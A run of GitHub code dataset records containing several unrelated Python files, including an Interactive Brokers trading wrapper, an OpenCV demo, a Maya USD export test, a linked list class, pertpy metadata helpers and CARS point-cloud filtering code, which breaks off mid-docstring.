unique\n order_dict = order.__dict__\n\n if \"order_dict\" not in locals():\n print(\"Order doesn't exist!\")\n order_dict = {}\n\n return order_dict\n\n def cancel_order(self, order_id: str, **kwargs: Any) -> Dict:\n \"\"\"Cancel an order with specific order_id.\"\"\"\n open_orders = self.ib.reqAllOpenOrders()\n for order in open_orders:\n if order.permId == int(order_id): # Order id is unique\n trade = self.ib.cancelOrder(order)\n trade_dict = trade.__dict__\n if \"trade_dict\" not in locals():\n print(\"Order doesn't exist!\")\n trade_dict = {}\n\n return trade_dict\n\n def cancel_all_orders(self, **kwargs: Any) -> List[Dict]:\n \"\"\"Cancel all orders.\"\"\"\n cancelled_orders = []\n open_orders = self.ib.reqAllOpenOrders()\n for order in open_orders:\n trade = self.ib.cancelOrder(order)\n trade_dict = trade.__dict__\n cancelled_orders.append(trade_dict)\n\n return cancelled_orders\n\n def list_positions(self, **kwargs: Any) -> List[Dict]:\n \"\"\"Get a list of open positions.\"\"\"\n positions = []\n for x in range(0, len(self.ib.positions())):\n positions.append(\n {\n \"account\": self.ib.positions()[x].account,\n \"contract\": self.ib.positions()[x].contract.__dict__,\n 
\"quantity\": self.ib.positions()[x].position,\n \"avgCost\": self.ib.positions()[x].avgCost,\n }\n )\n return positions\n\n def get_position(self, symbol: str, **kwargs: Any) -> Dict:\n \"\"\"Get an open position for a symbol.\"\"\"\n positions = self.list_positions()\n\n for x in positions:\n if x[\"contract\"][\"symbol\"] == symbol:\n position = x\n\n if \"position\" not in locals():\n print(\"Position for symbol doesn't exist!\")\n position = {}\n\n return position\n\n def close_position(self, symbol: str, **kwargs: Any) -> Dict:\n \"\"\"Liquidates the position for the given symbol at market price.\"\"\"\n for x in range(0, len(self.ib.positions())):\n if self.ib.positions()[x].contract.symbol == symbol:\n old_contract = self.ib.positions()[x].contract\n position = self.ib.positions()[x].position\n\n if \"position\" not in locals():\n print(\"Position for symbol doesn't exist!\")\n return {}\n\n # Define sell contract according to current contract/position\n new_contract = ibin.Stock(conId=old_contract.conId)\n self.ib.qualifyContracts(new_contract) # Validates the contract\n\n # Place an order using a contract and order object.\n order = ibin.MarketOrder(\"SELL\", position)\n trade = self.ib.placeOrder(contract=new_contract, order=order)\n assert order in self.ib.orders()\n\n return trade.__dict__\n\n def close_all_positions(self, **kwargs: Any) -> List[Dict]:\n \"\"\"Liquidates all open positions at market price.\"\"\"\n closed_positions = []\n for x in range(0, len(self.ib.positions())):\n old_contract = self.ib.positions()[x].contract\n position = self.ib.positions()[x].position\n\n if \"position\" not in locals():\n print(\"No positions to close!\")\n return [{}]\n\n # Define sell contract according to current contract/position\n new_contract = ibin.Stock(conId=old_contract.conId)\n self.ib.qualifyContracts(new_contract) # Validates the contract\n\n # Place an order using a contract and order object.\n order = ibin.order.MarketOrder(\"SELL\", position)\n trade = self.ib.placeOrder(new_contract, order)\n\n closed_positions.append(trade.__dict__)\n\n return closed_positions\n","repo_name":"paaliaq/tradingapi","sub_path":"src/tradingapi/ib/ib_api.py","file_name":"ib_api.py","file_ext":"py","file_size_in_byte":7905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1241915102","text":"import cv2\nimport numpy as np \nimage=cv2.imread('01.jpg',cv2.IMREAD_COLOR)\nroi=image[100:500,100:500]\n#image[100:500,100:500] [255,255,255]\n#print(roi)\ncv2.imshow('image',image)\ncv2.imshow('roi',roi)\ncv2.waitKey(0)\ncv2.destroyAllWindows() ","repo_name":"mu7ammad-3li/learning_opencv","sub_path":"04-image-operations.py","file_name":"04-image-operations.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10109274178","text":"import os\nimport unittest\n\nfrom maya import cmds\nfrom maya import standalone\n\nfrom pxr import Usd\nfrom pxr import UsdGeom\n\n\nclass testUsdExportMesh(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n standalone.initialize('usd')\n\n cmds.file(os.path.abspath('UsdExportMeshTest.ma'), open=True,\n force=True)\n\n cmds.loadPlugin('pxrUsd', quiet=True)\n\n @classmethod\n def tearDownClass(cls):\n standalone.uninitialize()\n\n def testExportAsCatmullClark(self):\n usdFile = os.path.abspath('UsdExportMesh_catmullClark.usda')\n cmds.usdExport(mergeTransformAndShape=True, file=usdFile,\n 
shadingMode='none', defaultMeshScheme='catmullClark')\n\n stage = Usd.Stage.Open(usdFile)\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/poly')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.none)\n self.assertTrue(len(m.GetNormalsAttr().Get()) > 0)\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/polyNoNormals')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.none)\n self.assertTrue(not m.GetNormalsAttr().Get())\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/subdiv')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.catmullClark)\n self.assertTrue(not m.GetNormalsAttr().Get())\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/unspecified')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.catmullClark)\n self.assertTrue(not m.GetNormalsAttr().Get())\n\n def testExportAsPoly(self):\n usdFile = os.path.abspath('UsdExportMesh_none.usda')\n cmds.usdExport(mergeTransformAndShape=True, file=usdFile,\n shadingMode='none', defaultMeshScheme='none')\n\n stage = Usd.Stage.Open(usdFile)\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/unspecified')\n self.assertEqual(m.GetSubdivisionSchemeAttr().Get(), UsdGeom.Tokens.none)\n self.assertTrue(len(m.GetNormalsAttr().Get()) > 0)\n\n # XXX: For some reason, when the mesh export used the getNormal()\n # method on MItMeshFaceVertex, we would sometimes get incorrect normal\n # values. Instead, we had to get all of the normals off of the MFnMesh\n # and then use the iterator's normalId() method to do a lookup into the\n # normals.\n # This test ensures that we're getting correct normals. The mesh should\n # only have normals in the x or z direction.\n\n m = UsdGeom.Mesh.Get(stage, '/UsdExportMeshTest/TestNormalsMesh')\n normals = m.GetNormalsAttr().Get()\n self.assertTrue(normals)\n for n in normals:\n # we don't expect the normals to be pointed in the y-axis at all.\n self.assertAlmostEqual(n[1], 0.0, delta=1e-4)\n\n # make sure the other 2 values aren't both 0.\n self.assertNotAlmostEqual(abs(n[0]) + abs(n[2]), 0.0, delta=1e-4)\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"JosephTom/PixarUSD","sub_path":"third_party/maya/lib/usdMaya/testenv/testUsdExportMesh.py","file_name":"testUsdExportMesh.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30555668235","text":"from turtle import *\n# 绘制斐波那契螺旋线1,1,2,3,5,8,13\ndef draw_square(r):\n penup()\n for _ in range(4):\n fd(r)\n left(90)\n pendown()\n circle(r, 90)\n return\n\ns = 0.618\nr = 50\nspeed()\nif __name__ == '__main__':\n for i in range(5):\n draw_square(r)\n r /= s\n done()\n","repo_name":"opollopo/GeekYangYuanyuzhe","sub_path":"254/luoxuan.py","file_name":"luoxuan.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24313794926","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Literal\n\nif TYPE_CHECKING:\n from collections.abc import Sequence\n\n\nclass MetaData:\n def _warn_unmatch(\n self,\n total_identifiers: int,\n unmatched_identifiers: Sequence[str],\n query_id: str,\n reference_id: str,\n metadata_type: Literal[\n \"cell line\",\n \"protein expression\",\n \"bulk RNA\",\n \"drug response\",\n \"moa\",\n \"compound\",\n ] = \"cell line\",\n verbosity: int | str = 5,\n ) -> None:\n \"\"\"Helper function to print out the unmatched 
identifiers.\n\n Args:\n total_identifiers: The total number of identifiers in the `adata` object.\n unmatched_identifiers: Unmatched identifiers in the `adata` object.\n query_id: The column of `.obs` with cell line information.\n reference_id: The type of cell line identifier in the meta data.\n metadata_type: The type of metadata where some identifiers are not matched during annotation, cell line, protein expression, bulk RNA expression, drug response, moa or compound. Defaults to \"cell line\".\n verbosity: The number of unmatched identifiers to print, can be either non-negative values or \"all\". Defaults to 5.\n \"\"\"\n if isinstance(verbosity, str):\n if verbosity != \"all\":\n raise ValueError(\"Only a non-negative value or 'all' is accepted.\")\n else:\n verbosity = len(unmatched_identifiers)\n\n if len(unmatched_identifiers) == total_identifiers:\n hint = \"\"\n if metadata_type in [\"protein expression\", \"bulk RNA\", \"drug response\"]:\n hint = \"Additionally, call the `CellLineMetaData.annotate()` function to acquire more possible query IDs that can be used for cell line annotation purposes.\"\n raise ValueError(\n f\"Attempting to match the query id {query_id} in 'adata.obs' to the reference id {reference_id} in the metadata.\\n\"\n f\"However, none of the query IDs could be found in the {metadata_type} annotation data.\\n\"\n \"To resolve this issue, call the `lookup()` function to create a LookUp object.\\n\"\n \"This enables obtaining the count of matched identifiers in the AnnData object for different types of reference and query IDs.\\n\"\n f\"{hint}\"\n )\n if len(unmatched_identifiers) == 0:\n return\n if isinstance(verbosity, int) and verbosity >= 0:\n verbosity = min(verbosity, len(unmatched_identifiers))\n if verbosity > 0:\n print(\n f\"[bold blue]There are {total_identifiers} identifiers in `adata.obs`. \"\n f\"However, {len(unmatched_identifiers)} identifiers can't be found in the {metadata_type} annotation, \"\n \"leading to the presence of NA values for their respective metadata.\\n\",\n \"Please check again: \",\n *unmatched_identifiers[:verbosity],\n \"...\",\n sep=\"\\n- \",\n )\n else:\n raise ValueError(\"Only 'all' or a non-negative value is accepted.\")\n","repo_name":"ONERAI/pertpy","sub_path":"pertpy/metadata/_metadata.py","file_name":"_metadata.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"17739913744","text":"class Node:\n def __init__(self, data=None, next=None):\n self.data=data\n self.next=next\nclass LinkedList:\n def __init__(self):\n self.head=None\n\n def insert_at_begin(self,data):\n node=Node(data,self.head)\n self.head= node\n\n def print(self):\n if self.head is None: #blank linked list\n print(\"Linked list is empty\")\n return \n itr = self.head #linked list is not blank, assigning head to the temporary variable\n llstr = '' #linkedlist string\n while itr: \n llstr += str(itr.data)+'---->' #appending the data to the string \n itr=itr.next #following the link in the linked list \n print(llstr)\n\n\n def insert_End(self, data):\n if self.head is None: #blank linked list\n self.head = Node(data, None) #assign head to created node\n return \n itr = self.head\n while itr.next:\n itr=itr.next\n itr.next=Node(data,None) #next of last element is null, so creating a new node \n\n def insert_values(self, data_list):\n self.head = None\n for data in data_list:\n self.insert_End(data)\n\n def get_length(self):\n count=0\n itr=self.head #iterator 
pointing at the head\n while itr: #iterator is not none\n count=count+1 \n itr=itr.next\n return count \n\n def remove_at(self,index):\n if index<0 or index>= self.get_length(): #if index is negative or more than the length\n raise Exception(\"Invalid index\")\n if index==0: #index is 0, i.e., pointing to head\n self.head = self.head.next\n return \n count=0 #count to reach the given index\n itr = self.head\n while itr:\n if count==index-1: #we need to stop at the element prior to the one we want to remove and modify the links\n itr.next=itr.next.next #modifying the links\n break \n itr=itr.next\n count+=1\n \n def insert_at(self,index, data):\n if index<0 or index>= self.get_length(): #if index is negative or more than the length\n raise Exception(\"Invalid index\")\n if index==0:\n self.insert_at_begin(data)\n return \n count=0\n itr=self.head\n while itr:\n if count==index-1: #stopping at the previous element to modify the link \n node = Node(data,itr.next) #creating the node to insert at that index\n itr.next=node\n break\n itr=itr.next\n count=count+1\n\n\n\n\nif __name__ == '__main__':\n ll= LinkedList()\n #ll.insert_at_begin(5)\n #ll.insert_at_begin(6)\n #ll.insert_End(1)\n #ll.insert_End(2)\n ll.insert_values([\"a\",\"b\",\"c\"])\n #ll.remove_at(2)\n ll.insert_at(0,\"e\")\n ll.print()\n ll.insert_at(2,\"f\")\n\n ll.print()\n print(\"length:\",ll.get_length())\n\n\n\n","repo_name":"Tarunvamsi/DataStructuresImplementations","sub_path":"LinkedLists.py","file_name":"LinkedLists.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3364639933","text":"import logging\nfrom typing import List, Tuple, Union\n\n# Third party imports\nimport numpy as np\nimport pandas\nimport xarray as xr\nfrom scipy.spatial import cKDTree  # pylint: disable=no-name-in-module\n\n# CARS imports\nfrom cars.core import constants as cst\nfrom cars.core import projection\n\n\ndef create_combined_cloud(  # noqa: C901\n cloud_list: List[xr.Dataset],\n dsm_epsg: int,\n color_list: List[xr.Dataset] = None,\n resolution: float = None,\n xstart: float = None,\n ystart: float = None,\n xsize: int = None,\n ysize: int = None,\n on_ground_margin: int = 0,\n epipolar_border_margin: int = 0,\n radius: float = 1,\n with_coords: bool = False,\n) -> Tuple[pandas.DataFrame, int]:\n \"\"\"\n Combine a list of clouds (and their colors) into a pandas dataframe\n structured with the following labels:\n\n * if no colors in input and no mask data present in cloud_list datasets:\n >>> labels=[cst.POINTS_CLOUD_VALID_DATA, cst.X, cst.Y, cst.Z]\n\n The combined cloud has x, y, z columns along with 'valid data' one.\n The valid data is a mask set to True if the data\n are not on the epipolar image margin (epipolar_border_margin),\n otherwise it is set to False.\n\n * if no colors in input and mask data present in cloud_list datasets:\n >>> labels=[cst.POINTS_CLOUD_VALID_DATA,\n >>> cst.X, cst.Y, cst.Z, cst.POINTS_CLOUD_MSK]\n\n The mask values are added to the dataframe.\n\n * if colors are set in input and mask data are present\n in the cloud_list datasets:\n >>> labels=[cst.POINTS_CLOUD_VALID_DATA,\n >>> cst.X, cst.Y, cst.Z, cst.POINTS_CLOUD_MSK,\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"0\",\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"1\",\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"2\"]\n\n Color channel information is added to the dataframe.\n\n * if colors in input, mask data present in the cloud_list datasets and\n the with_coords option 
is activated:\n >>> labels=[cst.POINTS_CLOUD_VALID_DATA,\n >>> cst.X, cst.Y, cst.Z, cst.POINTS_CLOUD_MSK,\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"0\",\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"1\",\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"2\"\n >>> cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n >>> cst.POINTS_CLOUD_COORD_EPI_GEOM_J,\n >>> cst.POINTS_CLOUD_IDX_IM_EPI]\n\n The pixel position of the xyz point in the original epipolar\n image (coord_epi_geom_i, coord_epi_geom_j) are added\n to the dataframe along with the index of its original cloud\n in the cloud_list input.\n\n :raise Exception: if a color_list is set\n but does not have the same length as the cloud list\n\n :param cloud_list: list of cloud points to rasterize\n :param dsm_epsg: epsg code for the CRS of the final output raster\n :param color_list: Additional list of images\n with bands to rasterize (same size as cloud_list), or None\n :param resolution: Resolution of rasterized cells, in cloud CRS units\n (if None, the whole clouds are combined)\n :param xstart: xstart of the rasterization grid\n (if None, the whole clouds are combined)\n :param ystart: ystart of the rasterization grid\n (if None, the whole clouds are combined)\n :param xsize: xsize of the rasterization grid\n (if None, the whole clouds are combined)\n :param ysize: ysize of the rasterization grid\n (if None, the whole clouds are combined)\n :param on_ground_margin: Margin added to the rasterization grid\n (default value: 0)\n :param epipolar_border_margin: Margin used\n to invalidate cells too close to epipolar border. (default value: 0)\n :param radius: Radius for hole filling\n (if None, the whole clouds are combined).\n :param with_coords: Option enabling the adding to the combined cloud\n of information of each point to retrieve their positions\n in the original epipolar images\n :return: Tuple formed with the combined clouds and color\n in a single pandas dataframe and the epsg code\n \"\"\"\n worker_logger = logging.getLogger(\"distributed.worker\")\n\n # check input data consistency\n if color_list is not None and len(cloud_list) != len(color_list):\n raise Exception(\"There shall be as many cloud elements as color ones\")\n\n epsg = None\n for cloud_list_item in cloud_list:\n if epsg is None:\n epsg = int(cloud_list_item.attrs[cst.EPSG])\n elif int(cloud_list_item.attrs[cst.EPSG]) != epsg:\n worker_logger.error(\n \"All points clouds do not have the same epsg code\"\n )\n\n # compute margin/roi and final number of data to add to the combined cloud\n roi = (\n resolution is not None\n and xstart is not None\n and ystart is not None\n and xsize is not None\n and ysize is not None\n )\n if roi:\n total_margin = (on_ground_margin + radius + 1) * resolution\n xend = xstart + (xsize + 1) * resolution\n yend = ystart - (ysize + 1) * resolution\n\n nb_data = [cst.POINTS_CLOUD_VALID_DATA, cst.X, cst.Y, cst.Z]\n\n # check if the input mask values are present in the dataset\n nb_data_msk = 0\n for cloud_list_item in cloud_list:\n ds_values_list = [key for key, _ in cloud_list_item.items()]\n if cst.POINTS_CLOUD_MSK in ds_values_list:\n nb_data.append(cst.POINTS_CLOUD_MSK)\n nb_data_msk = 1\n break\n\n if color_list is not None:\n clr_im = color_list[0].im.values\n nb_band_clr = clr_im.shape[0]\n list_clr = [\n \"{}{}\".format(cst.POINTS_CLOUD_CLR_KEY_ROOT, i)\n for i in range(nb_band_clr)\n ]\n nb_data.extend(list_clr)\n else:\n nb_band_clr = 0\n\n if with_coords:\n nb_data.extend(\n [\n cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n cst.POINTS_CLOUD_COORD_EPI_GEOM_J,\n 
cst.POINTS_CLOUD_IDX_IM_EPI,\n ]\n )\n\n # iterate trough input clouds\n cloud = np.zeros((0, len(nb_data)), dtype=np.float64)\n nb_points = 0\n for cloud_list_idx, cloud_list_item in enumerate(cloud_list):\n full_x = cloud_list_item[cst.X].values\n full_y = cloud_list_item[cst.Y].values\n full_z = cloud_list_item[cst.Z].values\n\n # get mask of points inside the roi (plus margins)\n if roi:\n\n # if the points clouds are not in the same referential as the roi,\n # it is converted using the dsm_epsg\n if epsg != dsm_epsg:\n (\n full_x,\n full_y,\n ) = projection.get_converted_xy_np_arrays_from_dataset(\n cloud_list_item, dsm_epsg\n )\n\n msk_xstart = np.where(full_x > xstart - total_margin, True, False)\n msk_xend = np.where(full_x < xend + total_margin, True, False)\n msk_yend = np.where(full_y > yend - total_margin, True, False)\n msk_ystart = np.where(full_y < ystart + total_margin, True, False)\n terrain_tile_data_msk = np.logical_and(\n msk_xstart,\n np.logical_and(msk_xend, np.logical_and(msk_ystart, msk_yend)),\n )\n terrain_tile_data_msk_pos = terrain_tile_data_msk.astype(\n np.int8\n ).nonzero()\n\n # if the points clouds are not in the same referential as the roi,\n # retrieve the initial values\n if epsg != dsm_epsg:\n full_x = cloud_list_item[cst.X].values\n full_y = cloud_list_item[cst.Y].values\n\n # if no point is found, continue\n if terrain_tile_data_msk_pos[0].shape[0] == 0:\n continue\n\n # get useful data bounding box\n bbox = [\n np.min(terrain_tile_data_msk_pos[0]),\n np.min(terrain_tile_data_msk_pos[1]),\n np.max(terrain_tile_data_msk_pos[0]),\n np.max(terrain_tile_data_msk_pos[1]),\n ]\n else:\n bbox = [0, 0, full_y.shape[0] - 1, full_y.shape[1] - 1]\n\n # add (x, y, z) information to the current cloud\n c_x = full_x[bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1]\n c_y = full_y[bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1]\n c_z = full_z[bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1]\n\n c_cloud = np.zeros(\n (len(nb_data), (bbox[2] - bbox[0] + 1) * (bbox[3] - bbox[1] + 1))\n )\n c_cloud[1, :] = np.ravel(c_x)\n c_cloud[2, :] = np.ravel(c_y)\n c_cloud[3, :] = np.ravel(c_z)\n\n ds_values_list = [key for key, _ in cloud_list_item.items()]\n\n if cst.POINTS_CLOUD_MSK in ds_values_list:\n c_msk = cloud_list_item[cst.POINTS_CLOUD_MSK].values[\n bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ]\n c_cloud[4, :] = np.ravel(c_msk)\n\n # add data valid mask\n # (points that are not in the border of the epipolar image)\n if epipolar_border_margin == 0:\n epipolar_margin_mask = np.full(\n (\n cloud_list_item[cst.X].values.shape[0],\n cloud_list_item[cst.X].values.shape[1],\n ),\n True,\n )\n else:\n epipolar_margin_mask = np.full(\n (\n cloud_list_item[cst.X].values.shape[0],\n cloud_list_item[cst.X].values.shape[1],\n ),\n False,\n )\n epipolar_margin_mask[\n epipolar_border_margin:-epipolar_border_margin,\n epipolar_border_margin:-epipolar_border_margin,\n ] = True\n\n c_epipolar_margin_mask = epipolar_margin_mask[\n bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ]\n c_cloud[0, :] = np.ravel(c_epipolar_margin_mask)\n\n # add the color information to the current cloud\n if color_list is not None:\n c_color = color_list[cloud_list_idx].im.values[\n :, bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ]\n\n for band in range(nb_band_clr):\n c_cloud[4 + nb_data_msk + band, :] = np.ravel(\n c_color[band, :, :]\n )\n\n # add the original image coordinates information to the current cloud\n if with_coords:\n coords_line = np.linspace(bbox[0], bbox[2], bbox[2] - bbox[0] + 1)\n coords_col = 
np.linspace(bbox[1], bbox[3], bbox[3] - bbox[1] + 1)\n coords_col, coords_line = np.meshgrid(coords_col, coords_line)\n\n c_cloud[4 + nb_data_msk + nb_band_clr, :] = np.ravel(coords_line)\n c_cloud[4 + nb_data_msk + nb_band_clr + 1, :] = np.ravel(coords_col)\n c_cloud[4 + nb_data_msk + nb_band_clr + 2, :] = cloud_list_idx\n\n # remove masked data (pandora + out of the terrain tile points)\n c_terrain_tile_data_msk = (\n cloud_list_item[cst.POINTS_CLOUD_CORR_MSK].values[\n bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ]\n == 255\n )\n\n if roi:\n c_terrain_tile_data_msk = np.logical_and(\n c_terrain_tile_data_msk,\n terrain_tile_data_msk[\n bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ],\n )\n\n c_terrain_tile_data_msk = np.ravel(c_terrain_tile_data_msk)\n\n c_terrain_tile_data_msk_pos = np.nonzero(~c_terrain_tile_data_msk)\n\n nb_points += c_cloud.shape[1]\n\n c_cloud = np.delete(\n c_cloud.transpose(), c_terrain_tile_data_msk_pos[0], 0\n )\n\n # add current cloud to the combined one\n cloud = np.concatenate([cloud, c_cloud], axis=0)\n\n worker_logger.debug(\"Received {} points to rasterize\".format(nb_points))\n worker_logger.debug(\n \"Keeping {}/{} points \"\n \"inside rasterization grid\".format(cloud.shape[0], nb_points)\n )\n\n pd_cloud = pandas.DataFrame(cloud, columns=nb_data)\n\n return pd_cloud, epsg\n\n\n# ##### Small components filtering ######\n\n\ndef small_components_filtering(\n cloud: pandas.DataFrame,\n connection_val: float,\n nb_pts_threshold: int,\n clusters_distance_threshold: float = None,\n filtered_elt_pos: bool = False,\n) -> Tuple[pandas.DataFrame, Union[None, pandas.DataFrame]]:\n \"\"\"\n Filter points cloud to remove small clusters of points\n (see the detect_small_components function).\n\n :param cloud: combined cloud\n as returned by the create_combined_cloud function\n :param connection_val: distance to use\n to consider that two points are connected\n :param nb_pts_threshold: number of points to use\n to identify small clusters to filter\n :param clusters_distance_threshold: distance to use\n to consider if two points clusters are far from each other or not\n (set to None to deactivate this level of filtering)\n :param filtered_elt_pos: if filtered_elt_pos is set to True,\n the removed points positions in their original\n epipolar images are returned, otherwise it is set to None\n :return: Tuple made of the filtered cloud and\n the removed elements positions in their epipolar images\n \"\"\"\n cloud_xyz = cloud.loc[:, [cst.X, cst.Y, cst.Z]].values\n index_elt_to_remove = detect_small_components(\n cloud_xyz, connection_val, nb_pts_threshold, clusters_distance_threshold\n )\n\n return filter_cloud(cloud, index_elt_to_remove, filtered_elt_pos)\n\n\ndef detect_small_components(\n cloud_xyz: np.ndarray,\n connection_val: float,\n nb_pts_threshold: int,\n clusters_distance_threshold: float = None,\n) -> List[int]:\n \"\"\"\n Determine the indexes of the points of cloud_xyz to filter.\n The clusters are made of 'connected' points\n (2 connected points have a distance smaller than connection_val)\n\n The removed clusters are composed of less than nb_pts_threshold points and\n are also far from other clusters\n (points are further than clusters_distance_threshold).\n\n If clusters_distance_threshold is set to None, all the clusters that are\n composed of less than nb_pts_threshold points are filtered.\n\n :param cloud_xyz: points kdTree\n :param connection_val: distance to use\n to consider that two points are connected\n :param nb_pts_threshold: number of 
points to use\n to identify small clusters to filter\n :param clusters_distance_threshold: distance to use\n to consider if two points clusters are far from each other or not\n (set to None to deactivate this level of filtering)\n :return: list of the points to filter indexes\n \"\"\"\n cloud_tree = cKDTree(cloud_xyz)\n\n # extract connected components\n processed = [False] * len(cloud_xyz)\n connected_components = []\n for idx, _ in enumerate(cloud_xyz):\n\n # if point has already been added to a cluster\n if processed[idx]:\n continue\n\n # get point neighbors\n neighbors_list = cloud_tree.query_ball_point(\n cloud_xyz[idx], connection_val\n )\n\n # add them to the current cluster\n seed = []\n seed.extend(neighbors_list)\n for neigh_idx in neighbors_list:\n processed[neigh_idx] = True\n\n # iteratively add all the neighbors of the points\n # which were added to the current cluster (if there are some)\n while len(neighbors_list) != 0:\n all_neighbors = cloud_tree.query_ball_point(\n cloud_xyz[neighbors_list], connection_val\n )\n\n # flatten neighbors\n new_neighbors = []\n for neighbor_item in all_neighbors:\n new_neighbors.extend(neighbor_item)\n\n # retrieve only new neighbors\n neighbors_list = list(set(new_neighbors) - set(seed))\n\n # add them to the current cluster\n seed.extend(neighbors_list)\n for neigh_idx in neighbors_list:\n processed[neigh_idx] = True\n\n connected_components.append(seed)\n\n # determine clusters to remove\n cluster_to_remove = []\n for connected_components_idx, connected_components_item in enumerate(\n connected_components\n ):\n if len(connected_components_item) < nb_pts_threshold:\n if clusters_distance_threshold is not None:\n # search if the current cluster has any neighbors\n # in the clusters_distance_threshold radius\n all_neighbors = cloud_tree.query_ball_point(\n cloud_xyz[connected_components[connected_components_idx]],\n clusters_distance_threshold,\n )\n\n # flatten neighbors\n new_neighbors = []\n for neighbor_item in all_neighbors:\n new_neighbors.extend(neighbor_item)\n\n # retrieve only new neighbors\n neighbors_list = list(\n set(new_neighbors) - set(connected_components_item)\n )\n\n # if there are no new neighbors, the cluster will be removed\n if len(neighbors_list) == 0:\n cluster_to_remove.extend(connected_components_item)\n else:\n cluster_to_remove.extend(connected_components_item)\n\n return cluster_to_remove\n\n\n# ##### statistical filtering ######\n\n\ndef statistical_outliers_filtering(\n cloud: pandas.DataFrame,\n k: int,\n std_factor: float,\n filtered_elt_pos: bool = False,\n) -> Tuple[pandas.DataFrame, Union[None, pandas.DataFrame]]:\n \"\"\"\n Filter points cloud to remove statistical outliers\n (see the detect_statistical_outliers function).\n\n :param cloud: combined cloud\n as returned by the create_combined_cloud function\n :param k: number of neighbors\n :param std_factor: multiplication factor to use\n to compute the distance threshold\n :param filtered_elt_pos: if filtered_elt_pos is set to True,\n the removed points positions in their original\n epipolar images are returned, otherwise it is set to None\n :return: Tuple made of the filtered cloud and\n the removed elements positions in their epipolar images\n \"\"\"\n cloud_xyz = cloud.loc[:, [cst.X, cst.Y, cst.Z]].values\n index_elt_to_remove = detect_statistical_outliers(cloud_xyz, k, std_factor)\n\n return filter_cloud(cloud, index_elt_to_remove, filtered_elt_pos)\n\n\ndef detect_statistical_outliers(\n cloud_xyz: np.ndarray, k: int, std_factor: float = 3.0\n) -> 
List[int]:\n    """\n    Determine the indexes of the points of cloud_xyz to filter.\n    The removed points have mean distances with their k nearest neighbors\n    that are greater than a distance threshold (dist_thresh).\n\n    This threshold is computed from the mean (mean_distances) and\n    standard deviation (stddev_distances) of all the points mean distances\n    with their k nearest neighbors:\n\n    dist_thresh = mean_distances + std_factor * stddev_distances\n\n    :param cloud_xyz: points kdTree\n    :param k: number of neighbors\n    :param std_factor: multiplication factor to use\n        to compute the distance threshold\n    :return: list of the points to filter indexes\n    """\n    # compute, for each point, all the distances to its k neighbors\n    cloud_tree = cKDTree(cloud_xyz)\n    neighbors_distances, _ = cloud_tree.query(cloud_xyz, k + 1)\n\n    # Compute the mean of those distances for each point\n    # np.mean is not used directly as each row\n    # contains the distance of the point to itself (always 0)\n    mean_neighbors_distances = np.sum(neighbors_distances, axis=1)\n    mean_neighbors_distances /= k\n\n    # compute mean and standard deviation of those mean distances\n    # for the whole point cloud\n    mean_distances = np.mean(mean_neighbors_distances)\n    stddev_distances = np.std(mean_neighbors_distances)\n\n    # compute distance threshold and\n    # apply it to determine which points will be removed\n    dist_thresh = mean_distances + std_factor * stddev_distances\n    points_to_remove = np.argwhere(mean_neighbors_distances > dist_thresh)\n\n    # flatten points_to_remove\n    detected_points = []\n    for removed_point in points_to_remove:\n        detected_points.extend(removed_point)\n\n    return detected_points\n\n\n# ##### common filtering tools ######\n\n\ndef filter_cloud(\n    cloud: pandas.DataFrame,\n    index_elt_to_remove: List[int],\n    filtered_elt_pos: bool = False,\n) -> Tuple[pandas.DataFrame, Union[None, pandas.DataFrame]]:\n    """\n    Filter all points of the cloud DataFrame\n    whose index is in the index_elt_to_remove list.\n\n    If filtered_elt_pos is set to True, the positions of the removed elements\n    in their original epipolar images are returned.\n\n    To do so the cloud DataFrame has to be built\n    with the 'with_coords' option activated.\n\n    :param cloud: combined cloud\n        as returned by the create_combined_cloud function\n    :param index_elt_to_remove: indexes of lines\n        to filter in the cloud DataFrame\n    :param filtered_elt_pos: if filtered_elt_pos is set to True,\n        the removed points positions in their original epipolar images are\n        returned, otherwise it is set to None\n    :return: Tuple composed of the filtered cloud DataFrame and\n        the filtered elements epipolar 